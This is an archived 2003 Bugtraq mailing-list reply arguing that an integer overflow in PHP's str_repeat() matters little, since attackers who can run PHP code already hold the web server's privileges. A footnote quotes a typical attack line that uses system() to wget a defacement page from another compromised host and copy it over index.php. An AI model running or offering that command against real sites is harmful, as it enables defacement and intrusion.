lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 3 Apr 2003 08:39:03 +0200
From: Goran Krajnovic <goran.krajnovic@...et.hr>
To: bugtraq@...urityfocus.com
Subject: Re: @(#)Mordred Labs advisory - Integer overflow in PHP str_repeat() function



On 2003.04.01 14:29 Sir Mordred wrote:
> The implementation of this function suffers from a simple integer overflow
> caused by 
> a very long second argument and could allow a local/remote attacker in the
> worst case to gain control over the web server.

This is a bit pointless, IMHO. 99% of PHP installations run the PHP code with
the user-id of the web server process (usually a low privilege user like
'nobody' or 'apache'). Exploiting one (of many) bugs in PHP to 'gain control
over the web server' is like getting a remote shell on a machine and then
running a buffer overflow exploit in order just to be able to run commands
instead of typing them into the shell directly.

If an attacker has the opportunity to execude PHP code of his choice on a
target server [1], he does not need to exploit a buffer overflow in PHP just to
get the privileges of the web server user - he already runs code with the
privileges of that user. And having the ability to run PHP code gives him just
about the same level of power as getting a non-root shell on the box.

Searching on http://bugs.php.net will give you a lot more ways to crash PHP,
and probably a number of these can be used to get a buffer overflow, but I
don't think that reporting each of them here will solve anything. Report them
to http://bugs.php.net.

[1] Usually by exploiting some of the poor programming practices in some PHP
applications, misconfigurations, or bugs. See
http://www.securityfocus.com/bid/3889 for example. In a typical attack, this is
used to execute code, and the code is usually system('wget
http://another.exploited.host/defaced-index.php'); system('cp defaced-index.php
index.php') or similar.

-- 
Goran Krajnović,  dipl. ing.
[ Goran.Krajnovic@...et.hr ]
 Hrvatski Telekom - HThinet

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ